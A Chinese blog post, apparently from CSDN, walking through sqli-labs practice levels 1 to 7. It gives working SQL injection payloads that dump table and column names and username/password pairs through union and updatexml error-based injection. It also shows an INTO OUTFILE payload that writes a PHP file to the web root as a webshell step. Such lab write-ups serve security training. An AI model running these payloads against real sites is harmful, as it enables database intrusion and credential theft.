sqli-labs靶场通关

已于 2024-08-08 23:38:01 修改
阅读量995 收藏 19
点赞数 17
文章标签: sql 数据库
于 2024-08-05 23:31:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wh15320219935/article/details/140932586
版权

less-01 字符型注入

根据php文件可以看出是进行单引号逃脱

加上注释符,有--+ 或者#

然后我们可以进行字段数查找

使用order by进行查询最大字段数,当输入4的时候发现报错证明最大值为3

接下来我们可以使用联合查询union select 

发现与之前没有任何变化,此时我们可以观察代码

发现他只取第一行,所以我们可以让第一个表查询为空,同时可以查询数据库中的一些数据名

知道当前的用户权限和库名以后我们就可以进行注入管理员账号密码,想要知道管理员账号密码我们还得需要知道数据库的表名和列名

我们可以通过mysql语句进行查询刚才security库中的所有表名,发现users这个表应该会存在我们需要的账号密码此时我们可以通过该表继续查询

?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

我们发现user表中的username和password就是我们想要拿到的管理员账号密码所以通过以下语句进行查找user表中的列名

?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

最后我们可以通过查询列名获取账号密码

?id=-1' union select 1,2,group_concat(username ,0x2b , password) from users--+

Less02

我们正常输入值的时候他是正常回显

我们可以尝试输入 ?id=1'

发现报错,所以可以知道这一关是数字型注入

后续操作如第一关一样

Less03

先正常输入?id=1进行取值判断是否进行回显,然后再输入?id=1'发现报错,通过报错我们可以发现是')注入;后续与上一致

Less04

可以判断字符注入为'')

后续与上一致

Less-05 报错注入

less-05

我们正常取值的时候发现进入界面 you are in...

然后我们输入?id=1'发现是‘闭合

此时我们可以尝试报错注入

?id=1%27and(select%20updatexml(1,concat(0x7e,(select%20database())),0x7e))--+

此时方法还是和之前一致,接着进入库中查询表然后查询列找到用户名和密码

?id=1%27and(select%20updatexml(1,concat(0x7e,(select%20group_concat(username,0x2b,password)from%20users)),0x7e))--+

但是我们发现账号和密码因为长度不够无法进行完全读取,因为updatexml函数只能进行到32位,此时我们可以运用substr进行截取

?id=1%27and(select%20updatexml(1,concat(0x7e,substr((select%20group_concat(username,0x2b,password)from%20users),32,64)),0x7e))--+

每次以32进行截取即可获取所有账号密码。

报错注入----函数updatexml

函数原型:updatexml(xml_document,xpath_string,new_value)
正常语法:updatexml(xml_document,xpath_string,new_value)
第一个参数:xml_document是string格式,为xml文档对象的名称 

第二个参数:xpath_string是xpath格式的字符串
第三个参数:new_value是string格式,替换查找到的负荷条件的数据 作用:改变文档中符合条件的节点的值

payload:id='and(select updatexml("anything",concat('~',(select语句())),"anything"))

爆数据库名:id=and(select updatexml(1,concat(0x7e,(select database())),0x7e))
爆表名:id=and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())),0x7e))
爆列名:id=and(select updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name="TABLE_NAME")),0x7e))
爆数据:id=and(select updatexml(1,concat(0x7e,(select group_concat(COLUMN_NAME)from TABLE_NAME)),0x7e))

substr函数

爆数据长度不够需要用到substr函数,默认截取1,32

'and(select updatexml(1,concat(0x7e,substr((select group_concat(COLUMN_NAME)from TABLE_NAME),32,64)),0x7e))

less06

经过尝试可以发现是"闭合

接下来方法与第五关一样

less07

正常取值输入发现回显‘use outfile”

我们可以利用Mysql上传webshell,利用outfile函数但有以下三个满足点

  1. mysql用户权限必须为root
  2. 知道网站的物理路径
  3. secure参数为空不能有值 该文件只能导出到/tmp/文件下,入侵也无法改变,该文件在my.ini下

所以注入如下

?id=1%27))%20union%20select%201,2,"<?php%20phpinfo();"%20into%20outfile%20"C:/phpStudy_64/phpstudy_pro/WWW/sqllabs/Less-7/password.php"--+

最后账号和密码会打印在password.php文件中

进厂要提早
关注
  • 17
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
SQL Server中CPU使用率过高的排查
主宰
08-05 308
如果sqlserver进程导致CPU使用率过高,则最常见的原因是执行表或索引扫描的查询,其次是排序、哈希操作和循环 (嵌套循环运算符或 WHILE (T-SQL) )。对于安装了sqlserver的服务器,可以先看下任务管理器中sqlserver对cpu的占用情况,确定是否是sqlserver导致cpu消耗过高。从输出中具有最高improvement_measure值的前5或10条建议开始。这些索引对性能有最显著的积极影响。使用以下查询检查是否缺少索引,并应用具有高改进度量值的任何建议索引。
SQL回顾
Wincreds的博客
08-05 450
②Cookie 是一种客户端的存储技术,用于在浏览器中存储少量数据。参数包含在请求体中,可以是键值对格式或其他格式,如 JSON。①Session 是一种服务器端的存储技术,用于在用户与网站的交互期间保持用户状态。会话数据通常存储在服务器上的文件或数据库中,可以永久存储用户信息,直到会话过期或被清除。会看到结果,正确密码,与其他的长度不一样,由于网站机制,防爬机制,这里我把密码从666改为了8,节约访问次数。旧密码无所谓,利用 admin’# ,进行修改,修改密码实际上修改的是admin的密码。
SQL Server 事务
a876106354的博客
08-09 429
SQL Server 事务是数据库操作的一个基本特性,它允许你将一系列数据库操作组合成一个原子单元,这个单元中的所有操作要么全部成功,要么全部失败。事务具有以下四个重要的属性,通常被称为ACID属性。
[SWPUCTF 2021 新生赛]easy_sql
2301_80218721的博客
08-05 385
这个文章讲的东西基本可以够我去理解一些基本的思路和做法,然后文章里面还附带了一些基本的演示。然后我这里直接就是照着那个文章的思路去写的题目。转web之后第一次做sql,还不是很懂。然后就得到了flag。
SQL Zoo 8+.NSS Tutorial
weixin_61524392的博客
08-09 627
以下数据来自。
sql第一次
nianwan2157的博客
08-05 268
最后截取192-200发现是已经截取完了。可以看到还没有截取完,再截取64-96。注意不要少写括号,不然会报错。1-32之后截取32-64。
达梦数据库(十) -------- mybatis-plus 整合达梦时,自动生成的 sql 语句报错
weixin_52466601的博客
08-09 240
问题原因:mybatis-plus 生成的 sql 语句字段是小写的,同时还包含数据库关键字。框架会默认加上(`)符号,该符号在达梦数据库中无法被识别,需要更换为 (")。方案二:修改实体类的字段名称避免使用达梦数据库关键字。
sqllab靶场练习第1~15关
qq_64951792的博客
08-06 937
sqllab第1-15关
sqliabs靶场练习
Zombie_QP的博客
08-06 474
到这里咋们就可以获取当前数据名和版本号,这个就涉及mysql数据库的一些命令了。Select @@GLOBAL.VERSION 数据库版本信息。system_user() 数据库系统用户账户名称和登录主机名。@@version_compile_os——操作系统版本。这里提示我们输入数字值的ID作为参数,我们输入?current_user() 当前登录用户和登录主机名。Select VERSION() 数据库版本信息。Select @@VERSION 数据库版本信息。@@datadir——数据库路径。
sqllabs游戏
qq_63890458的博客
08-05 844
less-1:http://127.0.0.1/sqllabs/less-2/?id=1 less-2:http://127.0.0.1/sqllabs/less-2/?id=1 less-3:http://127.0.0.1/sqllabs/less-3/?id=1 less-4:http://127.0.0.1/sqllabs/less-4/?id=1%27 less-5:http://127.0.0.1/sqllabs/less-5/?id=1%27 and updatexml(1,concat(0x
C#-了解ORM框架SqlSugar并巧妙使用(附相关数据库工具)
rwo_bear的博客
08-05 4508
通过NuGet包管理器搜索SqlSugar、MySql.Data、Newtonsoft.Json三个包并安装。
phpstudy搭建sqlilabs本地靶场
wzzzzz06的博客
08-05 594
为了方便查看代码运行中变量值,需要安装php debug。
SQL各种注入详解加案例--持续更新
m0_72286569的博客
08-05 694
sql执行的时候,floor是向下取整,配合rand(0)*2产生的前五位数字一定是01101,这下就简单了,我们来模拟group_by过程,遍历 表第一行时,先计算出一个 x=0security,查临时表,不存在,再次计算 x 然后插入 x=1security;id=1”,这里的?时间盲注和布尔盲注的区别是,不管输入的数据正不正确只显示一个跳转页面,当然在注入的时候可以加一个sleep函数使得页面进行沉睡,当访问正确的时候,页面沉睡几秒后跳转,访问错误页面即可跳转。1,当输入Less-1/?
PostgreSQL JSON 字段操作指南
最新发布
Java小白白的博客
08-09 340
PostgreSQL 提供了强大的 JSON 和 JSONB 数据类型支持,允许存储和处理结构化的 JSON 数据。在实际应用中,我们经常需要从 JSON 字段中提取多层嵌套的属性或处理数组中的数据。本文将详细介绍如何在 PostgreSQL 中获取和操作 JSON 字段中的属性值。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值